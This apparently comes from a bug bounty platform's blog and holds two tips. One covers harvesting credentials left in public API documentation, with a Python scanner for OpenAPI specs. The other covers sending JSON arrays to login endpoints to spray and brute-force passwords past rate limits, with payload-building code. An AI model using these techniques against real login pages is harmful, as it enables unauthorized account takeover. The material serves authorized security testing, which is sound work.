
Bug Bounty Tips: API Documentation Bugs for Administrator Panel Takeovers


In this write-up, RootBakar describes a significant vulnerability found on an Indonesian website: what the bug was, what it allowed, and how it was discovered.

Bug Discovery:

During this engagement, RootBakar found that valid credentials were disclosed in the site's public API documentation, so anyone who read the documentation could log in with them.

API documentation normally only explains how to send requests to each endpoint. In this case, however, the documentation also contained real usernames and passwords. Logging in with them gave access to the website, and one of the accounts carried the administrator role, so the administrator panel was effectively taken over.

Impact:

Administrator Panel Takeover

Proof of concept:

  1. Navigate to the API Documentation link on the website.
  2. Search the API documentation for keywords such as "username" or "password" (related terms such as "token", "secret" and "api_key" are worth a look as well).
  3. Multiple usernames and passwords are discernible in the API Documentation.
  4. Notably, the username [email protected] and password redacted are among them.
  5. Log in to the website using these credentials.
  6. Successfully log in and gain access as an administrator.
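The keyword search in steps 2 and 3 is easy to do by hand on a short page, but machine-readable documentation (OpenAPI/Swagger JSON, Postman collections) can be large and credentials tend to hide in "example" and "default" slots or in free-text descriptions. The script below, an added example and not part of RootBakar's write-up, walks a parsed OpenAPI document and reports string values that sit under credential-like keys, plus "username=... password=..." patterns inside descriptions. The sample spec, the key list and the regular expressions are constructed assumptions; treat the output as a list of candidates to verify by logging in, as in step 5.

```python
import json
import re
import sys
from typing import Any, Iterator, List, Tuple

# Keys whose values are worth inspecting. Assumption: a starting list; extend it
# with the target's own naming (e.g. "passwd", "client_secret").
CREDENTIAL_KEYS = re.compile(
    r"(?i)(user(name)?|pass(word|wd)?|pwd|secret|token|api[_-]?key|authorization)"
)

# OpenAPI slots that hold a concrete value (not a type) underneath a property name,
# e.g. properties -> password -> example.
VALUE_SLOTS = {"example", "default", "enum", "x-example"}

# Free-text patterns such as "username=admin password: hunter2" in descriptions.
INLINE_CREDENTIAL = re.compile(
    r"(?i)\b(user(?:name)?|pass(?:word)?|secret|token)\s*[:=]\s*(\S+)"
)

# Constructed sample spec for demonstration; not the documentation from the write-up.
SAMPLE_SPEC = json.loads(r"""
{
  "openapi": "3.0.0",
  "info": {"title": "Constructed sample API", "version": "1.0"},
  "paths": {
    "/auth/login": {
      "post": {
        "summary": "Obtain a session token",
        "description": "For staging, use username=qa@example.com password=qa123 (remove before release).",
        "requestBody": {"content": {"application/json": {
          "schema": {"type": "object", "properties": {
            "username": {"type": "string", "example": "admin@example.com"},
            "password": {"type": "string", "example": "Sup3rS3cret!"}
          }},
          "example": {"username": "ops@example.com", "password": "changeme"}
        }}},
        "responses": {"200": {"description": "Session token issued",
          "content": {"application/json": {"example": {"token": "eyJhbGciOi..."}}}}}
      }
    }
  }
}
""")


def walk(node: Any, path: Tuple = ()) -> Iterator[Tuple[Tuple, Any]]:
    """Yield (path, leaf) for every scalar in a parsed JSON/YAML document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, path + (key,))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, path + (index,))
    else:
        yield path, node


def find_credentials(spec: Any) -> List[Tuple[str, str]]:
    """Return (location, value) pairs that look like disclosed credentials."""
    hits: List[Tuple[str, str]] = []
    for path, value in walk(spec):
        if not isinstance(value, str) or not value.strip():
            continue
        keys = [k for k in path if isinstance(k, str)]  # drop list indices
        if not keys:
            continue
        last = keys[-1]
        parent = keys[-2] if len(keys) > 1 else ""
        location = " > ".join(str(k) for k in path)
        # Structural hit: the value's own key, or the property it is an example of,
        # is credential-like.
        if CREDENTIAL_KEYS.search(last) or (last in VALUE_SLOTS and CREDENTIAL_KEYS.search(parent)):
            hits.append((location, value))
            continue
        # Free-text hit: "password=..." style fragments inside any other string.
        for match in INLINE_CREDENTIAL.finditer(value):
            hits.append((location, match.group(2)))
    return hits


if __name__ == "__main__":
    # Usage: python find_creds.py openapi.json  (falls back to the built-in sample)
    spec = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_SPEC
    for location, value in find_credentials(spec):
        print(f"{location}: {value}")
```

On the sample the script reports the two schema examples, the two values in the request example, the example token and the two staging credentials in the description; every one of them is a candidate to try at the login page before reporting.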

Notes:

  1. The provided credentials carry the role of an administrator.
  2. Always check whether usernames and passwords that appear in API documentation are real: example credentials are often copied from working accounts, so try them.

That is the gist of RootBakar's finding. We hope it proves useful and inspires fellow bug hunters; constructive feedback from the bug hunting community is welcome.

A tip from BugBounter for bug bounty hunters: would you like to be featured on social media with your bug bounty tip? – Sign up on BugBounter, and contact us with your bug bounty tip.


Bug Bounty Tip: Utilizing JSON and Lists for ATO Testing


The bug bounty tip of this week comes from Mohamed Reda.

When testing a login function during a bug bounty program, sending JSON lists instead of strings can help uncover potential Account Takeover (ATO) vulnerabilities. The idea is to change the request payload so that the email and password fields carry arrays and then observe how the backend handles them: a backend that does not enforce the expected type may evaluate every value in the array, so a single request carries many guesses and a per-request rate limit or lockout counter only sees one attempt.

Procedure

1. Modify Request Body

Change the request body to JSON (if it is not already) and send lists (JSON arrays) rather than strings for the email and password fields.

From:
{
    "email": "email",
    "password": "password"
}

To:
{
    "email": [
        "email1",
        "email2"
    ],
    "password": [
        "password1",
        "password2"
    ]
}

2. Test for ATO Vulnerabilities

a. Single Password Test

  • Use a list of emails and try a single password across all of them (password spraying). Verify whether any email-password combination results in a successful login.

b. Brute Force Test

  • Use a list of emails and a list of passwords.
  • Use an intruder-style tool (for example Burp Intruder) to send the combinations systematically.
  • Check for successful logins using different email and password combinations.
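To make concrete what steps 1 and 2 are probing for, the following added example (not Mohamed Reda's code) models both sides: a helper that builds the list-form body from step 1, a hypothetical lenient backend that accepts arrays and succeeds if any pair matches, and a hardened backend that rejects anything but a single string per field. The user table and the two handlers are constructed assumptions used to illustrate the behaviour; against a real target you would send the built payload to the login endpoint and compare the response with a normal failed login.

```python
import json
import secrets
from typing import Callable, Iterable, Optional

# Constructed user table for the demonstration (illustrative; not from the post).
USERS = {
    "alice@example.com": "hunter2",
    "bob@example.com": "correct-horse-battery",
}

LoginFn = Callable[[str], Optional[str]]


def build_payload(emails: Iterable[str], passwords: Iterable[str]) -> str:
    """Step 1: the list-form JSON body, many emails and passwords in one request."""
    return json.dumps({"email": list(emails), "password": list(passwords)})


def build_scalar_payload(email: str, password: str) -> str:
    """The ordinary single-credential body the endpoint was designed for."""
    return json.dumps({"email": email, "password": password})


def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]


def login_lenient(body: str) -> Optional[str]:
    """Hypothetical vulnerable backend: it silently coerces strings and lists alike
    and reports success if ANY email/password pair matches. This is the behaviour
    the list test is looking for; one request here equals len(emails)*len(passwords)
    guesses, which defeats per-request rate limiting and lockout counters."""
    data = json.loads(body)
    for email in _as_list(data.get("email")):
        for password in _as_list(data.get("password")):
            stored = USERS.get(email) if isinstance(email, str) else None
            if stored is not None and password == stored:
                return email
    return None


def login_strict(body: str) -> Optional[str]:
    """Hardened backend: enforce one string per field before any comparison."""
    data = json.loads(body)
    email, password = data.get("email"), data.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return None  # lists, numbers and null are rejected outright
    stored = USERS.get(email, "")
    # Constant-time compare; a real service compares password hashes, not plaintext.
    if stored and secrets.compare_digest(stored.encode(), password.encode()):
        return email
    return None


def single_password_test(emails: Iterable[str], password: str, login: LoginFn) -> Optional[str]:
    """Step 2a: spray one password across a list of emails in a single request."""
    return login(build_payload(emails, [password]))


def brute_force_test(emails: Iterable[str], passwords: Iterable[str], login: LoginFn) -> Optional[str]:
    """Step 2b: every email against every password, all carried in one body."""
    return login(build_payload(emails, passwords))


if __name__ == "__main__":
    emails = ["nobody@example.com", "alice@example.com", "bob@example.com"]
    guesses = ["password", "hunter2"]
    print("lenient:", brute_force_test(emails, guesses, login_lenient))
    print("strict: ", brute_force_test(emails, guesses, login_strict))
```

The signal to look for on a real target is the difference between the two handlers: with the lenient behaviour a list payload that contains one valid pair logs in, whereas a correctly typed endpoint returns the same error for a list as for wrong credentials. A response that differs from a plain failed login (a 500, a different error message, or a success) is worth following up even when it is not an immediate takeover.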

Please Note

Always conduct security testing within the scope of the bug bounty program and with explicit authorization. Respect ethical guidelines and adhere to responsible disclosure practices when identifying and reporting vulnerabilities.

This approach helps uncover potential vulnerabilities in the login process, ensuring a thorough security assessment and contributing to a more secure system.

Get Popular with BugBounter!

Get featured on BugBounter with your bug bounty tip. Sign up on BugBounter as a cybersecurity researcher today, and contact our Community Manager Salih with your username on BugBounter via their email, [email protected].